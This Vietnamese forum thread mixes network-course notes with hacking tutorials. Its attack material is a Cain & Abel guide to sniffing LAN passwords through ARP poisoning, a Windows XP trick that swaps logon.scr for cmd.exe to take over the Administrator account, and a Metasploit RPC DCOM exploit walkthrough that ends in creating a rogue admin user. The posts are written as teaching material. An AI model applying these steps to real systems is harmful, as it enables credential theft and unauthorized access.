Mạc Sương

Mạc Sương

Chuyên sĩ, lẽ đặc sản vùng, miền quê hương!
 
Trang ChínhTrang Chính  ..  Đăng kýĐăng ký  Đăng NhậpĐăng Nhập  

Đăng ký thành viên để hiển thị
các nội dung trong diễn đàn...
Chưa Thành viên:

Thành viên:


Latest topics
» cụ thể là chép vào thư mục này
by macsuong 1/11/2017, 10:55 am

» Địa chỉ facebook
by macsuong 1/11/2017, 10:45 am

» Các trích nướng loại 1
by macsuong 8/2/2017, 2:18 pm

» Cá thu loại 1
by macsuong 8/2/2017, 1:47 pm

» Đặc Sản quê Hương Xứ Nghệ
by macsuong 8/2/2017, 11:03 am

» Cảnh sát biển Việt Nam theo dõi Hải Dương-981 vào Biển Đông
by macsuong 29/12/2015, 3:52 pm

» File word bị lội "This error message can appear if the document you are
by ngoctram.nhim 19/7/2015, 10:02 pm

» Những câu châm ngôn cuộc sống ý nghĩa
by macsuong 11/11/2014, 11:29 am

» SẢN PHẨM MỚI 10/2014
by bimbip 4/10/2014, 8:17 pm

» Bảng báo giá sản phẩm mỹ nghệ
by macsuong 30/5/2014, 4:31 pm

» Cảm ơn Trung Quốc vì đưa giàn khoan đến thềm lục địa Việt Nam và sau đó...
by macsuong 9/5/2014, 10:16 am

» TẠI SAO TÔI KHÔNG VÀO ĐƯỢC DIỄN ĐÀN?
by gacon 3/12/2013, 9:46 pm

» .....CHÚC MỪNG....
by gacon 3/12/2013, 9:43 pm

» Tạo chương trình khởi động cùng window 7
by macsuong 23/10/2013, 11:01 am

» Nồi cơm khổng tử
by macsuong 26/9/2013, 9:51 pm

» OsMonitor phần mềm giám sát mạng LAN (phần mềm giám sát mạng nội bộ, mạng văn phòng)
by piaorou86 30/3/2013, 11:39 pm

» PGS Văn Như Cương: Tôi nuôi lợn, tại sao cấm tôi?
by ubuntu 23/1/2013, 12:42 pm

» Sự thật về ngày tận thế năm 2012
by macsuong 9/12/2012, 8:54 pm

» Nhân loại từng trải qua bao nhiêu Ngày Tận thế trong lịch sử?
by macsuong 9/12/2012, 8:30 pm

» Bài thơ thêm một (Trần Hòa Bình)
by bimbip 6/11/2012, 10:29 am

Top posters
macsuong
 
ubuntu
 
bimbip
 
gacon
 
hero
 
dongnaitimban
 
bonghongcaiao
 
tuquynh
 
nghean
 
kytet
 

Share | 
 

 KHÓA HỌC MCSA 2011

Xem chủ đề cũ hơn Xem chủ đề mới hơn Go down 
Tác giảThông điệp
ubuntu
.
.



Bài gửiTiêu đề: KHÓA HỌC MCSA 2011   6/9/2011, 2:09 pm

1. Giới thiệu về Sniffer
-Sniffer là gì?
-Sniffer được dùng để làm gì?
-Phương thức kỹ thuật mà Sniffer sử dụng là gì?
-Một số chương trình Sniffer thông dụng: dsniff, snort, cain, ettercap, sniffer pro…
-Sniffer có thể thực hiện trên môi trường nào?
-Những hình thức Sniffer!
Sniffer là gì?
Là một hình thức nghe lén trên hệ thống mạng
Dựa trên những điểm yếu của cơ chế TCP/IP
Sniffer là một kỹ thuật bảo mật, được phát triển nhằm giúp đở những nhà Quản trị mạng.
Man in the middle là kiểu Sniffer hiệu quả nhất
Các hình thức Sniffer
•Active: Chủ động ( Switch )
•Passive: Thụ động ( Hub )
o Sniffer được dùng làm gì?
Được phát triển để thu thập các gói tin trong hệ thống
Mục đích ban đầu: Giúp nhà quản trị mạng quản trị tốt hệ thống
Biến thể của Sniffer là các chương trình nghe lén bất hợp pháp như: Chương trình nghe lén Yahoo, MSN, ăn cắp password Email v.v.
Sniffer hoạt động chủ yếu dựa trên phương thức tấn công ARP
Tấn công ARP được khai thác như thế nào?
Quá trình hoạt động của Sniffer!





o Quá trình “đầu độc” ARP
Host A và Host B là 2 Máy tính đang “nói chuyện” với nhau
Host C là “kẻ Sniffer”
Ở Host A trên bảng ARP có lưu địa chỉ IP và MAC tương ứng của Host B
Ở Host B trên bảng ARP có lưu địa chỉ IP và MAC tương ứng của Host A
Host C thực hiện quá trình nghe lén:
•Host C gữi các ARP packet tới cả Host A và Host B có nội dung sau: “ tôi là A, B, MAC và IP của tôi là XX, YY”
o Quá trình đầu độc ARP
•Host A nhận lầm Host C là Host B
•Host B nhận lầm Host C là Host A
Quá trình “nói chuyện” giữa Host A và Host B, tất cả thông tin đều bị Host C “nghe thấy”.
o Môi trường Sniffer hoạt động!
Mạng LAN, mạng WAN, mạng WLAN
Điều kiện cần chỉ là cùng chung Subnet Mark khi Sniffer.
o Những hình thức Sniffer
Đó là các hình thức Sniffer bằng kỹ thuật máy tính nhằm khai thác thông tin riêng tư!
Bị nhìn trộm khi gỏ Password cũng là 1 hình thức Sniffer !
Bị nghe lén Điện thoại cũng là Sniffer!
Bị đọc trộm thư hay E-mail cũng là một hình thức Sniffer!
Bị nhìn trộm nội dung Chat cũng là Sniffer!
o Các phần mềm thực hiện.
CAIN & ABEL (Sử dụng phần mềm CAIN)
Yêu cầu về phần cứng:
- ổ cứng cần trống 10 Mb
- hệ điều hành Win 2000/2003/XP
- cần phải có Winpcap
Phiên bản càng mới càng tốt
o Chương trình WireShark
Là một chương trình Sniffer hiệu quả!
Có khả năng bắt được hầu hết các gói tin, của rất nhiều các giao thức.
Có thể dùng để kiểm tra lưu lượng băng thông, phân loại lưu lượng theo từng giao thức.
Nhược điểm: Không có sẵn bộ giải mã và bộ lọc password như Cain
Thông tin hiển thị là dạng thô
2. Ping sweep thường để kiểm tra sự tồn tại một lúc nhiều host (thường dùng tool)
Ping chỉ kiểm tra mỗi lúc một host.
3. Scan ports
Port Scanner : Thông thường một hacker để tấn công một hệ thống, điều đầu tiên là phải tìm hiểu rất cặn kẻ về sơ đồ mạng của hệ thống đó. Tiếp theo là tìm hiểu về các port và các access point để có thể tiếp cận hệ thống. Hiện nay, hầu hết các hacker đều sử dụng các chương trình quét port (port scaner) để tìm kiếm các port được mở của hệ thống.

Nhìn chung các chương trình quét port đều được xây dựng dưới 2 phương pháp quét sau: chương trình dùng để quét một port duy nhất của máy đích tại một thời điểm và chương trình dùng để quét một số lượng các port được quy định sẵn tại cùng một thời điểm với một dãy các địa chỉ đích cần quét. Phương pháp một hiện nay ít sử dụng, đa số các chương trình scan port hiện nay đều sử dụng phương pháp 2.

Vậy thực chất scan port làm việc như thế nào? Nó sẽ tạo các gói tin ra sao để máy đích có thể trả lời và nó nhận biết được các port được mở tại máy đích? Sau đây là một số phương pháp tạo gói tin mà các chương trình scan port thường dùng là:

- TCP Connect scan: đây là phương pháp chủ yếu và cơ bản nhất. Chương trình cố gắng tạo các gói tin để kết nối đến mỗi cổng trên một máy, nó sẽ cố gắng thực hiện các cuộc gọi hệ thống và hoàn thành qui trình bắt tay 3 bước. Nếu máy đích trả lời port đó sẽ active. Đây là phương pháp khá phổ biến hiện nay và được dùng nhiều nhất trong hầu hết các chương trình scan port. Tuy nhiên phương pháp này sẽ không còn hiện quả nếu như các máy đích được bảo vệ bởi 1 firewall hoặc người sử dụng ẩn đi các thông tin về port được scan thì xem như phương pháp này cũng không thể hoạt động.

- TCP SYN Scan: Lưu ý rằng, TCP là một giao thức tin cậy, nó sử dụng phương pháp bắt tay 3 bước để thiết lập các kết nối. Nếu ta muốn tìm 1 port có được mở hay không trên một máy, ta sẽ gửi 1 gói tin đến port đó với bit SYN được bật. Nếu port đó được mở, máy đó sẽ gửi lại gói tin với bit thứ 2 với bit SYN và ACK được bật. Lúc này, ta có thể nhanh chóng xác định được rằng, port đó đã active, việc đơn giản bây giờ là ta chỉ cần tạo ra thêm 1 gói tin thứ 3 để hoàn tất việc bắt tay 3 bước. Phương pháp này còn được gọi là phương pháp hafl open connection. Phương pháp này ít được sử dụng hơn phương pháp trên do nhiều máy tính không cho phép tạo half open connection.

- FIN Scan: Ta biết, sau khi 1 kết nối TCP được lập, 2 máy sẽ gửi packet cho nhau. Khi chúng kết nối, chúng sẽ gửi các gói tin với bit FIN được bật. Cách TCP làm việc là nếu ta gửi 1 gói tin đến 1 port bị đóng, hệ thống sẽ gửi ngược lại lệnh RST để báo cho ta biết port đó không active. Như vậy chương trình scan port bằng phương pháp này sẽ hoạt động như sau: nó sẽ gửi một gói tin với bit FIN được bật. Nếu port đó mở nó sẽ xóa gói tin này nếu như port đó bị khóa, thì nó sẽ gửi lại lệnh RST (reset)

- ACK Scan: Khi chúng ta cố gắng thiết lập một kết nối mới, hệ thống phải gửi 1 gói tin với bit SYN được lập. Nếu hệ thống đó gửi đến một máy mà máy đó không chấp nhận kết nối thì nó sẽ gửi ngược lại cho ta RST. Có thể là bạn nghĩ rằng phương pháp này giống với phương pháp FIN Scan nhưng thực chất nó có ưu điềm hơn phương pháp trên. Như chúng ta biết, để thiết lập một cầu nối tin cậy, thì gói tin thứ 2 phải được gửi với bit ACK được bật. Chính điều này mà các firewall tận dụng để lọc bỏ các gói tin gửi đến để tạo kết nối. Vậy nếu ta tạo một gói tin với bit ACK được bật, tức là gói tin ta gửi đi sẽ đóng vai trò là gói tin thứ 2 trong cầu nối tin cậy. Bây giờ thì có lẽ bạn đã hiểu, ta đã qua mặt được firewall vì hiện nay ta đã đóng vai trò là máy đích cho cầu nối TCP của một máy trong mạng có firewall bảo vệ. Firewall không thể lọc bỏ các gói có bit ACK được bật từ bên ngoài gửi vào, vì nếu như thế thì mạng LAN bên trong Firewall sẽ không thể trao đổi thông tin với các máy bên ngoài. Vậy là đã vượt qua Firewall, việc còn lại thực hiện giống như phương pháp đầu tiên.

Trên đây là một số phương pháp mà các chương trình scan port sử dụng để scan các port. Các bạn có thể sử dụng Visual C++ để viết thử các phần mềm này. Lần tới tui sẽ giới thiệu một số phần mềm Scan port và tìm kiếm các Access point để giúp đỡ cho admin trong việc quản lý hệ thống. Để hiểu thêm các bit và cấu tạo khung tin của các gói tin, bạn có thể tham khảo thêm tài liệu về mô hình TCP/IP.

Ở đây có đoạn code bằng c# bạn tham khảo thử:
Khai báo
CODE:
using System.Net.Sockets;

CODE:
// Store values from the NumericUpDown to variables

StartPort = Convert.ToInt32(numStart.Value);

EndPort = Convert.ToInt32(numEnd.Value);

// Reset the progress bar

prgScanning.Value = 0;

// Set the max value of the progress bar

prgScanning.Maximum = EndPort - StartPort + 1;

// Let the user know the application is busy

Cursor.Current = Cursors.WaitCursor;

// Loop through the ports between start port and end port

for (int CurrPort = StartPort; CurrPort <= EndPort; CurrPort++)

{

TcpClient TcpScan = new TcpClient();

try

{

// Try to connect

TcpScan.Connect(txtIP.Text, CurrPort);

// If there's no exception, we can say the port is open

txtLog.AppendText("Port " + CurrPort + " open");

}

catch

{

// An exception occured, thus the port is probably closed

txtLog.AppendText("Port " + CurrPort + " closed");

}

// Increase the progress on the progress bar

prgScanning.PerformStep();

}

// Set the cursor back to normal

Cursor.Current = Cursors.Arrow;

Đoạn mã trên nếu dùng StartPort =1 và EndPort=25 và txtIP=192.168.0.1 thì có kết quả như sau

Cập nhật thư mục trên máy win7
A. ở máy con



Cập nhật vào window 7 (hình như trên)
2.Star/run/ gõ: gpupdate /force

B. Ở máy win 7: share thư mục


Về Đầu Trang Go down
macsuong
,
,
avatar


Bài gửiTiêu đề: Re: KHÓA HỌC MCSA 2011   7/9/2011, 10:20 am






Hướng dẫn bằng hình ảnh sử dụng Cain & Abel để hack mạng
LAN




1. Download: [You must be registered and logged in to see this link.]

2. Cài đặt: Như cài
đặt phần mềm bình thường.

3. Sử dụng:

Bật C&A lên
và:

[You must be registered and logged in to see this link.]

[You must be registered and logged in to see this link.]

[You must be registered and logged in to see this link.]

[You must be registered and logged in to see this link.]

[You must be registered and logged in to see this link.]

[You must be registered and logged in to see this link.]

[You must be registered and logged in to see this link.]

[You must be registered and logged in to see this link.]


__________________








_________________
Về Đầu Trang Go down
macsuong
,
,
avatar


Bài gửiTiêu đề: Re: KHÓA HỌC MCSA 2011   7/9/2011, 10:23 am

Kỹ thuật Sniff Password sử dụng Cain & Abel - 1 chương trình giúp dò tìm mật khẩu và user trong mạng LAN - Có thể tìm đựoc hầu hết các mật khẩu như hosting , yahoo , ...

Cain & Abel là một trong những công cụ đứng trong top các công cụ về security. Các bạn có thể tại phiên bản mới nhất tại [You must be registered and logged in to see this link.]
Hiện tại mình sử dụng phiên bản Cain & Abel v4.9.14 có thể chạy trên vista như các bạn nên nhớ tất tường lửa đi mới sài được đó !

Các tính năng của Cain thì khỏi phải nói , quá trời trời luôn, ở đây mình chỉ giới thiệu Sniff Password. Các bạn có thể tham khảo thêm những tính năng của nó trong tài liệu kèm theo chương trình.

Bước 1: Sau khi install xong Cain và khởi động Cain thì ta cần phải cấu hình Network Adapter cho đúng.
Trên menu của Cain chọn Configure –> lựa chọn Network Adapter phù hợp
Click Start Sniffer
Bước 2: Lựa chọn Tab Sniffer –> Scan MAC Addresses, ở đây sẽ ra danh sách các địa chỉ IP mà chương trình Scan được
Bước 3: Tab bên dưới của Tab Sniffer lựa chọn phần APR. Tai khung APR ta có thể thêm địa chỉ IP mà cần sniff. Lựa chọn IP đích , IP nguồn
Bước 4: Và click Start APR, và ngồi chờ password “về làng”

Các bạn có thể xem video clip sau để biết rõ hơn
Trong đoạn video clip mình sẽ sniff password gửi từ máy có IP: 192.168.1.7.
Địa chỉ IP máy mình là 192.168.1.6 có sử dụng chương trình Cain đang chờ dzớt bất kỳ password nào mà máy 192.168.1.7 đệ trình

_________________
Về Đầu Trang Go down
gacon
THÀNH VIÊN
THÀNH VIÊN
avatar


Bài gửiTiêu đề: Re: KHÓA HỌC MCSA 2011   7/9/2011, 3:01 pm

Danh sách các link trực tiếp để các bạn tiện việc download:
(Update 25/03/09)

Nmap 5.21 (http://nmap.org/dist/nmap-5.21-setup.exe)

Wireshark 1.2.8 (http://media-2.cacetech.com/wireshark/win32/wireshark-win32-1.2.8.exe)

HPing 2 (http://www.hping.org/hping2.win32.tar.gz)

Cain & Abel 4.9.35 (http://www.oxid.it/downloads/ca_setup.exe)

TSGrinder 2.01 (http://www.hammerofgod.com/download/tsgrinder-2.03.zip)

Metasploit Framework 3.40 (http://www.metasploit.com/releases/framework-3.4.0.exe)

Pwdump7 (http://www.openwall.com/passwords/dl/pwdump/Pwdump7.zip)

Burpsuite 1.3 (http://portswigger.net/suite/burpsuite_v1.3.03.zip)

Ferret & Hamster (http://www.erratasec.com/sidejacking.zip)

-- Live CD --

BackTrack 4 (1.2010): Live CD (ftp://ftp.uio.no/linux/backtrack/bt4-final.iso) - VMWare (http://moon.backtrack-linux.org/downloads/bt4-final-vm.zip)

Ophcrack 2.3.1: XP (http://downloads.sourceforge.net/ophcrack/ophcrack-xp-livecd-2.3.1.iso) - Vista (http://downloads.sourceforge.net/ophcrack/ophcrack-vista-livecd-2.3.1.iso)
Về Đầu Trang Go down
ubuntu
.
.



Bài gửiTiêu đề: Re: KHÓA HỌC MCSA 2011   8/9/2011, 9:17 am

Hack mật khẩu Admin trong Windows XP từ User thường
Bạn
chỉ được truy cập vào máy tính với một quyền user thông thường và điều đó khiến
bạn bực bội mỗi khi cần cài đặt hay sử dụng một chương trình nào đó. Bài hướng
dẫn này sẽ giúp bạn giải tỏa bực bội bằng cách “hack chơi” mật khẩu của Admin
mà không cần sử dụng tới một phần mềm thứ ba nào cả.





Lưu
ý: Cách này không áp dụng được cho ổ đĩa NTFS





-
Vào Start > Run gõ lệnh cmd và nhấn Enter. Cửa sổ lệnh sẽ được mở ra và nhập
chính xác các câu lệnh sau:





cd\
trở về thư mục gốc


cd\windows\system32
vào thư mục system32


mkdir
hackdir tạo thư mục hackdir


copy
logon.scr hackdir\logon.scr sao lưu file logon.scr vào thư mục hackdir


copy
cmd.exe hackdir\cmd.exe sao lưu file cmd.exe vào thư mục hackdir


del logon.scr xóa file
logon.scr gốc


copy
hackdir\cmd.exe logon.scr sao lưu file cmd.exe trong thư mục hackdir trở về
system32 và đổi tên thành logon.scr


exit
đóng cửa sổ lệnh








-
Sau đó khởi động lại máy tính.





Với
các câu lệnh trên bạn đã thay đổi file chạy giao diện Windows Welcome thông
thường bằng lệnh khởi chạy chương trình cửa sổ lệnh Command Prompt với quyền
system chứ không phải quyền user nào cả. Do đó tại cửa sổ lệnh này bạn có thể
tiến hành thay đổi mật khẩu của tài khoản Admin trên máy.





Sau
khi khởi động lại máy tính, thay vì màn hình Welcome bạn sẽ thấy một cửa sổ
lệnh hiện ra.





Tại
đây bạn có thể tiến hành theo 1 trong 2 cách sau:





Cách
1: Đổi mật khẩu tài khoản Admin sẵn có





Tại
cửa sổ lệnh có thể sử dụng một trong các lệnh sau:





net
user thay mật khẩu tài khoản quản trị bằng
mật khẩu mới


hoặc





net
user xóa trắng mật khẩu của tài khoản này









dụ: net user Administrator 123 câu lệnh này đổi mật khẩu tài khoản
Administrator thành 123.





Cách
2: Thêm một tài khoản mới với quyền Admin





Tại
cửa sổ lệnh lần lượt gõ các lệnh sau:





net
user /add thêm một tài khoản với tên và mật
khẩu tương ứng


net
localgroup Administrators /add đưa tài khoản vừa tạo vào nhóm
quản trị








Vậy
là thông qua 2 cách này, bạn có thể đăng nhập vào tài khoản vừa tạo hoặc sử
dụng mật khẩu vừa đổi của tài khoản Administrator để đăng nhập vào máy tính với
quyền quản trị mức cao nhất.





Quan
trọng: Đừng quên copy các file trong thư mục hackdir trở về thư mục system32 để
hệ thống của bạn hoạt động trở lại như bình thường.
Về Đầu Trang Go down
ubuntu
.
.



Bài gửiTiêu đề: Re: KHÓA HỌC MCSA 2011   8/9/2011, 9:21 am

Một số lệnh cơ bản trong mạng LAN

Một số lệnh cơ bản trong mạng LAN hay được sử dụng, nhất là dùng để kiểm tra, điều khiển, hay truy cập từ xa tới máy tính khác trong mạng LAN. Các lệnh này hoàn toàn có thể dùng những công cụ khác có sẵn của Windows như cmd.exe để thực hiện, hoặc dùng chương trình để thực hiện thay thế cho việc dùng dòng lệnh.

1.Lệnh Ping
Chức năng: Lệnh Ping được dùng để thử xem mạng TCP/IP có trở ngại gì giữa các computers không hoặc để kiểm tra xem một máy tính có kết nối với mạng không.
[You must be registered and logged in to see this link.]

Cú pháp: ping ip/host [/t][/a][/l][/n]
Chú thích:
- ip/host: ip là địa chỉ IP của máy cần kiểm tra; host là tên của máy tính cần kiểm tra. Người ta có thể sử dụng địa chỉ IP hoặc tên của máy tính
Ví dụ: ping 192.168.1.1
- [/t]: Sử dụng tham số này để máy tính liên tục “ping” đến máy tính đích, cho đến khi bạn bấm Ctrl + C
- [/a]: Nhận địa chỉ IP từ tên host
- [/l]: Xác định số gói tin sẽ gửi đi.
Ví dụ: ping 192.168.1.1/n 5
- [/n]: Xác định độ rộng của gói tin gửi đi kiểm tra. Một số hacker sử dụng tham số này để tấn công từ chối dịch vụ một máy tính (Ping of Death – một loại DoS).
Ví dụ: ping 192.168.1.1 /l 65535
Ngoài ra, còn một số thông tin khác, bạn có thể tự tham khảo với câu lệnh ping /?
Lệnh Ping sẽ gửi các gói tin từ máy tính bạn đang ngồi tới máy tính đích. Thông qua giá trị mà máy tính đích trả về đối với từng gói tin, bạn có thể xác định được tình trạng của đường truyền (chẳng hạn: gửi 4 gói tin nhưng chỉ nhận được 1 gói tin, chứng tỏ đường truyền rất chậm (xấu)). Hoặc cũng có thể xác định máy tính đó có kết nối hay không (Nếu không kết nối,kết quả là Unknow host)….

2. Lệnh IPConfig
Chức năng: Ta dùng lệnh IPConfig khi cần biết trạng thái của TCP/IP configuration của computer. Khi dùng lệnh IPConfig với /all switch, chương trình sẽ hiển thị một báo cáo chi tiết về configuration của tất cả card mạng, kể cả các miniports mạng rộng (Wide Area Network) nào hiện diện, thường dùng cho remote access hay các móc nối Virtual Private Network (VPN). Với DNS dynamics update bạn cũng có thể dùng IPConfig để đăng ký computer vào dịch vụ DNS.
Cú pháp: ipconfig /all
Chú thích: Có một số switches khác của lệnh IPConfig cũng rất thông dụng:
- /flushdns: Xóa bỏ cache chứa tên trong DNS
- /registerdns: Làm mới lại tất cả Dynamic Host Configuration Protocol (DHCP) leases và đăng ký lại tất cả tên DNS. Một lease là một hợp đồng mà DHCP cho phép một computer được dùng một IP Address trong thời hạn bao lâu.
- /displaydns: Hiển thị cache của DNS resolver
- /release: [Card (adapter)] Hủy bỏ lease về một IP Address cho một cạt. Nếu không nói rõ tên cạt nào thì DHCP hủy bỏ mọi leases
- /renew: [Card (adapter)] Phát hành một lease mới với IP Address cho một cạt. Nếu không nói rõ tên cạt nào thì DHCP phát hành lease mới cho mọi card.
Bạn nên thận trọng khi dùng lệnh IPConfig trên client computer. Có nhiều features tân tiến của IPConfig tuy hay nhưng không nên dùng trên một máy client nếu không được sự trợ giúp của một administrator về mạng. Dùng lệnh nầy sai lạc có thể làm cho client computer mất móc nối với server.
Ðể biết thêm về các switches của IPConfig hãy đánh IPConfig /?

3. Lệnh Tracert
Chức năng: Lệnh này sẽ cho phép bạn “nhìn thấy” đường đi của các gói tin từ máy tính của bạn đến máy tính đích, xem gói tin của bạn vòng qua các server nào, các router nào…
Cú pháp: tracert ip/host
Chú thích: ip là địa chỉ IP của máy đích; host là tên của máy tính đích. Ngoài ra chỉ cần đánh Tracert sẽ hiển thị chỉ dẩn như sau:

4. Lệnh Netstat
Chức năng: Lệnh Netstat cho phép ta liệt kê tất cả các kết nối ra và vào máy tính của chúng ta. Nếu bạn sử dụng lệnh này mà thấy mấy cái port đang ở chế độ listening lạ hoắc thì yên chí là máy bạn dính trojan rồi đấy. Cẩn thận kẻo mất password

Cú pháp: Netstat [/a][/e][/n]
Chú thích:
- [/a]: Hiển thị tất cả các kết nối và các cổng đang lắng nghe (listening)
- [/e]: hiển thị các thông tin thống kê Ethernet
- [/n]: Hiển thị các địa chỉ và các số cổng kết nối…
Ngoải ra còn một vài tham số khác, hãy gõ Netstat/? để biết thêm

5. Lệnh FTP
Chức năng: FTP là một giao thức được sử dụng để gửi và nhận file giữa các máy tính với nhau. Windows đã cài đặt sẵn lệnh ftp, có tác dụng như một chương trình chạy trên nền console (văn bản), cho phép thực hiện kết nối đến máy chủ [You must be registered and logged in to see this link.]
Cú pháp: ftp ip/host
Nếu kết nối thành công, chương trình sẽ yêu cầu bạn nhập Username và pass. Nếu username và pass hợp lệ, bạn sẽ được phép upload, duyệt file… trên máy chủ.
Chú thích: Một số lệnh ftp cơ bản.
- CD : chuyển sang thư mục khác trên máy chủ
- DIR: Xem danh sách các file và thư mục của thư mục hiện thời trên máy chủ
- MDIR : Tạo một thư mục mới có tên thu_muc trên máy chủ
- RMDIR : Xoá (remove directory) một thư mục trên máy chủ
- PUT FILE: tải một file file (đầy đủ cả đường dẫn. VD: c:\tp\bin\baitap.exe) từ máy bạn đang sử dụng lên máy chủ.
- CLOSE: Đóng phiên làm việc
- QUIT: Thoát khỏi chương trình ftp, quay trở về chế độ DOS command.
Ngoài ra còn một vài lệnh nữa, xin mời các bạn tìm hiểu thêm.
Như vậy, từ nay trở đi, nếu bạn nào có một website riêng thì không cần phải lo đến chuyện phải có chương trình ftp nữa nhé. Dùng lệnh này, đảm bảo chạy ở đâu cũng được (tất nhiên trừ những mạng máy tính sử dụng proxy).

6. Lệnh Telnet
Chức năng: Telnet là một ứng dụng cho phép người dùng ngồi trên một thiết bị đầu cuối có thể thông qua kết nối mạng đến một thiết bị từ xa để điều khiển nó bằng câu lệnh như là đang ngồi tại máy ở xa. Telnet cho phép tạo kết nối với thiết bị từ xa, thu thập thông tin và chạy chương trình.
Cú pháp: telnet IP/host port
Chú thích:
- ip là địa chỉ IP của thiết bị đầu cuối; host là tên của thiết bị đầu cuối.
- port là cổng để giao tiếp với thiết bị đầu cuối.
Ví dụ: telnet 192.168.1.1 80 sẽ thiết lập phiên telnet với thiết bị có địa chỉ IP là 192.168.1.1 với port là 80
Ngoài ra bạn cũng có thể sử dụng lệnh telnet /? để tìm hiểu một số tham số khác

7. Lệnh NSLookup
Chức năng: NSLookup là một công cụ tiện dụng để giải quyết những khó khăn về DNS, chẳng hạn như host name resolution (tìm IP Address của một computer) bằng cách đọc những records trong DNS database.
Cú pháp: nslookup
Chú thích:
- name là host name của record mà bạn đang tìm
- server là tên của server mà bạn muốn hỏi.
Nếu server không được cung cấp thì sẽ chọn default server.

8. Lệnh NET
Lệnh NET là một lệnh ngoại trú (tức là không có sẵn) nhưng nó luôn được đi kèm với hầu hết các hệ điều hành Windows của Microsoft và nó là một lệnh rất cần thiết và quang trọng dùng để xâm nhập một hệ thống lệnh NET không đi một mình mà nó đi chung với những phương thức khác để kết hợp thành một tổ hợp cụ thể. Chính vì tầm quang trọng của nó nên tôi tách hẳn nó ra thành một chương riêng biệt
• NET VIEW
Chức năng: Lệnh này cho phép xem danh sách các máy trong mạng, hoặc xem các tài nguyên chia sẻ tại một máy trên mạng
Cú pháp: net view \\IP/host
Chú thích:
- ip là địa chỉ IP của máy tính hoặc domain; host là tên của máy tính hoặc domain.
Nếu chỉ đánh net view và nhấn enter, thì nó sẽ hiện ra danh sách các máy tính trong mạng cùng domain quản lý với máy tính bạn đang sử dụng.
Nếu đánh net view \\IP hoặc \\host, thì nó sẽ hiển thị các tài nguyên chia sẻ của máy tính đó.
• NET USE
Chức năng: Lệnh này dùng để kết nối máy của người đang thực hiện tới một tài nguyên được chia sẽ trên hệ thống mạng với một quyền hạn nhất định.
Cú pháp: Net use \\IP/host\Sharedata “Password” /user:”User”

(Dùng để kết nối tới một tài nguyên nhất định khi biết username và password)
Net use \\ IP/host \ipc$ “Password” /user:”User”
(Dùng để kết nối một IPC$ đến máy tính)
Chú thích:
- ip là địa chỉ IP của máy tính chứa tài nguyên chia sẽ; host là tên của máy tính chứa tài nguyên chia sẽ.
- Sharedata là tài nguyên chia sẽ
- User là tên user được cấp trước
- Password là password của user
Ví dụ: Để kết nối ICP$ đến máy có địa chỉ IP là 192.168.1.2 với username là administrator và password là 123456
Net use \\192.168.1.2\ipc$ “123456″ /user:”administrator”
• NET USER
Chức năng: Lệnh này dùng để Tạo/Xóa tài khoản người dùng, hoặc hiện danh sách tài khoản nếu không có tham số.
Cú pháp: Net User [username pass] [/add]
(tạo người dùng có tên là username và password)
Net User [username] [/delete]
(xóa người dùng có tên là username)
Chú thích:
- Username : tên người dùng
- pass : mật khẩu của người dùng
• NET SHARE
Chức năng: Lệnh này dùng để chia sẽ tài nguyên trên máy tính
Cú pháp: Net share sharename=path
Chú thích:
- path ở đây có thể là một ổ đĩa hoặc đường dẫn tuyệt đối tới một thư mục hoặc máy in .v.v.
Ví dụ: Net share DATA=C:\ /Unlimited
(Chia sẽ ổ đĩa C:\ lấy tên là ổ data với quyền truy cập không giới hạn)
Ngoài các lệnh Net view, Net use, Net user, Net share ra thì tổ hợp lệnh nét còn bao gồm một số lệnh nữa như là lệnh Net file, Net session, Net group, Net start, Net stop, Net time,… Tuy nhiên những lệnh này chỉ tác động trên máy localhost nên các bạn có thể tự tìm hiểu thêm.
Về Đầu Trang Go down
ubuntu
.
.



Bài gửiTiêu đề: Re: KHÓA HỌC MCSA 2011   13/9/2011, 10:25 am

Các bài lab của nepol:
[You must be registered and logged in to see this link.]
Về Đầu Trang Go down
bimbip
.
.
avatar


Bài gửiTiêu đề: Re: KHÓA HỌC MCSA 2011   21/9/2011, 10:24 am

Tầm quan trọng của Update (Metasploit Attack)

Chúng ta , người dùng thường ít ai bât windows
update lên vi sợ khi update lên làm máy của mình ngày chậm chạp. Như vậy
thì lỗi thì càng lúc càng nhiều mà bản vá thì lại không được update và
sẽ bị hacker lợi dụng tấn công máy của bạn.
Hôm nay mình giới thiệu cho bạn một cách đơn giản mà hacker thường lợi dụng để tấn công các máy không được cập nhật các bản vá.

Tool sử dụng: Metaslpoit 3
Mô hình : Mô hình của chúng ta là, LK
đang đứng trên máy attacker xài w2k3 có IP có IP là 10.19.139.180 và
attack vào máy victim chạy w2k3 chưa được update với IP là 10.19.139.181

[You must be registered and logged in to see this link.]

Mục đích : Nắm quyền của máy DC2 và remote desktop qua DC2
Thực hiện:
Đầu tiên bạn cần phải cài đặt Metasploit :

[You must be registered and logged in to see this link.]

Sau khi cài đặt xong ta chạy với Mestasploit GUI

[You must be registered and logged in to see this link.]

Giao diện nhìn ngàu thật:
Tiếp theo ta chọn Exploit  Windows  dcerpc . Và ta sẽ chọn bug : Microsoft RPC DCOM Interface Overflow để khai thác.
Right click –> chọn Excute

[You must be registered and logged in to see this link.]

- Tiếp theo bạn chọn Forward ở bước chọn target.

[You must be registered and logged in to see this link.]

- Ta chọn windows/shell/shell_blind_tcp rồi bấm forward

[You must be registered and logged in to see this link.]

- Bước tiếp theo ta nhập ip của target vào :

[You must be registered and logged in to see this link.]

- Sau đó bạn chọn apply ở bước tiếp theo
- Sau khi apply thành công thì bạn đã tạo được session đến máy victim
rùi . ban chỉ cần chọn “Interact Session” để kết nối vào máy victim

[You must be registered and logged in to see this link.]

- Hihi như vậy bạn đã nẳm trong cmd của victim rùi .

[You must be registered and logged in to see this link.]

- Việc đầu tiên mình làm sẽ là change pass administrator hoặc là tạo 1
user và add vào group administrator (Mình đang đứng với quyền
administrator nên có thể làm tất cả)
+ Ở đây mình tạo user luongkhiem và add vào group administrator bằng 2 câu lệnh


Code:

C:\WINDOWS\system32>net user luongkhiem 123 /add
net user luongkhiem 123 /add
The command completed successfully.


C:\WINDOWS\system32>net localgroup administrators luongkhiem /add
net localgroup administrators luongkhiem /add
The command completed successfully.

- Như vậy mình đã là quyền administrator bây giờ mục đích còn lại
của mình là remote desktop vào máy victim . Đầu tiên ta kiểm tra coi máy
victim có mở remote desktop hay không bằng cách dùng lệnh netstat
[You must be registered and logged in to see this link.]
- Như vậy là máy victim ko có mở port 3339 . như vậy ta cần phải tìm cách open port này .
- Trước tiên cần coi máy đang chạy những dịch vụ vào



Code:

C:\WINDOWS\system32>net start
These Windows services are started:

Application Layer Gateway Service
Automatic Updates
COM+ Event System
Computer Browser
